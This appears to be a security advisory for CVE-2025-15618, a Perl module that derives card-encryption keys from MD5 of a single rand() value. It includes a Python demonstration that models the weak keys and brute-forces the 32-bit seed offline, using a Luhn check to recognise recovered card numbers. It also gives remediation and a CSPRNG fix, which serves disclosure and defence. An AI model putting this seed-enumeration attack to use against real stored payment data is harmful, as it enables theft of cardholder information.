CVE-2025-15618

Business::OnlinePayment · StoredTransaction

The Business::OnlinePayment::StoredTransaction Perl module derives the secret keys it uses to encrypt stored credit card data from an MD5 hash of a single, predictable output of Perl's rand(), so the keys can be enumerated.

Executive summary

Secret keys are derived from a predictable pseudo-random value, so an attacker who obtains the stored ciphertext can enumerate the small effective key space offline and decrypt credit card transaction data, potentially exposing every card the module has stored.

Vulnerability

The module generates each secret key by MD5-hashing the result of a single call to Perl's built-in rand(). rand() is a deterministic pseudo-random number generator, not a CSPRNG: its output is fixed entirely by a small seed (32 bits on current perls), and a single double-precision value carries at most about 50 bits even with a perfect seed. Hashing with MD5 adds no entropy; it only maps the small set of possible rand() outputs onto 128-bit strings. An attacker holding stored ciphertext can therefore enumerate every candidate seed, derive the corresponding key, and test each decryption offline (a Luhn-valid 13 to 19 digit number is an easy success check), so the keys are recoverable by brute force, or by outright prediction when the seed is known or guessable. The weakness is the entropy of the hash input, not MD5 itself; swapping MD5 for SHA-256 would not fix it.
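The following is an added example and is not code from Business::OnlinePayment::StoredTransaction or its author. It models the key construction described above (MD5 of one rand() output) and shows how an attacker with nothing but stored ciphertext recovers the key by enumerating the seed; it also shows the CSPRNG-based replacement the remediation section calls for. Three things are assumptions rather than facts taken from this page: rand() is modelled on Perl's internal drand48 (used since Perl 5.20), the float is hashed after Perl's default "%.15g" stringification, and since the module's cipher is not described here a SHA-256 keystream constructed for the demo stands in for it. The function and constant names are the example's own.

```python
"""Added example, not code from Business::OnlinePayment::StoredTransaction.

Models a key built as MD5(rand()) and recovers it from ciphertext alone by
enumerating the PRNG seed.  Assumptions (labelled, not taken from the page):

  * rand() is modelled on Perl's internal drand48 (Perl 5.20 and later):
    a 48-bit LCG whose state is initialised from a 32-bit seed.
  * The float is hashed after Perl's default "%.15g" stringification.
  * The module's real cipher is not on the page; a SHA-256 keystream
    constructed for this example stands in so a recovered key can be checked.
"""
import hashlib
import secrets
from typing import Optional, Tuple

LCG_A, LCG_C, LCG_MASK = 0x5DEECE66D, 0xB, (1 << 48) - 1
DRAND48_SEED_LOW = 0x330E          # low 16 bits set by srand48 / Perl_drand48_init


def perl_rand(seed: int) -> float:
    """First rand() value of a perl process seeded with a 32-bit `seed` (drand48 model)."""
    state = ((seed & 0xFFFFFFFF) << 16) | DRAND48_SEED_LOW
    state = (LCG_A * state + LCG_C) & LCG_MASK
    return state / (1 << 48)


def weak_key(seed: int) -> bytes:
    """The vulnerable construction: MD5 of one stringified rand() output.
    MD5 adds no entropy, so the key space is just the 2**32 seed space."""
    return hashlib.md5(("%.15g" % perl_rand(seed)).encode("ascii")).digest()


def strong_key() -> bytes:
    """The fix: 32 bytes from the OS CSPRNG (Crypt::URandom::urandom(32) in Perl)."""
    return secrets.token_bytes(32)


def toy_cipher(key: bytes, data: bytes) -> bytes:
    """Stand-in stream cipher for the demo only: XOR with SHA-256(key || counter).
    Symmetric, so the same call encrypts and decrypts."""
    out = bytearray()
    block = b""
    for i, byte in enumerate(data):
        if i % 32 == 0:
            block = hashlib.sha256(key + (i // 32).to_bytes(4, "big")).digest()
        out.append(byte ^ block[i % 32])
    return bytes(out)


def luhn_ok(pan: str) -> bool:
    """Luhn check: the attacker's oracle for 'this decryption is a real card number'."""
    if not pan.isdigit() or not 13 <= len(pan) <= 19:
        return False
    total = 0
    for pos, ch in enumerate(reversed(pan)):
        digit = int(ch)
        if pos % 2 == 1:
            digit = digit * 2 - 9 if digit > 4 else digit * 2
        total += digit
    return total % 10 == 0


def recover_seed(ciphertext: bytes, max_seed: int = 1 << 32) -> Optional[int]:
    """Offline brute force: try every seed until the plaintext is a Luhn-valid PAN.
    2**32 MD5-plus-decrypt trials is hours in Python and minutes in C;
    `max_seed` only bounds the demo run."""
    for seed in range(max_seed):
        plaintext = toy_cipher(weak_key(seed), ciphertext)
        if plaintext.isascii() and luhn_ok(plaintext.decode("ascii")):
            return seed
    return None


SAMPLE_PAN = "4111111111111111"   # constructed Luhn-valid test number, not real card data
DEMO_SEED = 4242                  # unknown to the attacker; kept small so the demo is quick


def demo() -> Tuple[Optional[int], str]:
    """Encrypt under the weak key, then recover seed and card number from ciphertext alone."""
    stored = toy_cipher(weak_key(DEMO_SEED), SAMPLE_PAN.encode("ascii"))
    seed = recover_seed(stored, max_seed=1 << 16)
    recovered = toy_cipher(weak_key(seed), stored).decode("ascii") if seed is not None else ""
    return seed, recovered


if __name__ == "__main__":
    print(demo())                 # (4242, '4111111111111111')
```

The search succeeds because the only secret is the 32-bit seed: every other input to the key (the LCG constants, the stringification, MD5) is public and deterministic. A key from strong_key() gives 256 bits of entropy and no seed to enumerate. Note that the demo's Luhn oracle needs only the stored ciphertext, which is why data already encrypted under the weak keys must be re-encrypted rather than merely rotated going forward.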

Business impact

The failure of the encryption mechanism directly undermines the confidentiality of stored credit card data. Cardholder data encrypted under recoverable keys does not meet PCI DSS requirements for protecting stored account data, so exposure could bring compliance failure, significant financial penalties, and loss of customer trust. The CVSS score of 9.1 reflects the critical risk of compromised encryption of financial data.

Remediation

Immediate Action: Stop using Business::OnlinePayment::StoredTransaction version 0.01. Move to a release whose key generation draws from a cryptographically secure random number generator (CSPRNG), for example 32 bytes from the operating system's random source (Crypt::URandom on CPAN), rather than a hash of rand().

Proactive Monitoring: Treat every record encrypted under the weak keys as potentially exposed. Audit all stored transaction data, generate fresh keys with the secure version, and re-encrypt existing records under them; rotating keys for new data alone leaves the old ciphertext decryptable. Watch for bulk reads of the transaction store, since the attack needs nothing but the ciphertext.

Compensating Controls: Apply database-level encryption and strict access controls to the stored ciphertext as defense in depth. These limit who can obtain the ciphertext but do not strengthen the keys, so they supplement the upgrade rather than replace it.

Exploitation status

Public Exploit Available: No

Analyst recommendation

Sound key generation is the foundation of secure online payments; encrypting card data under predictable keys is a critical failure. Organizations must move at once to a securely patched version of the module or to a payment processing library that adheres to modern security standards, and must re-encrypt data currently protected by the weak keys.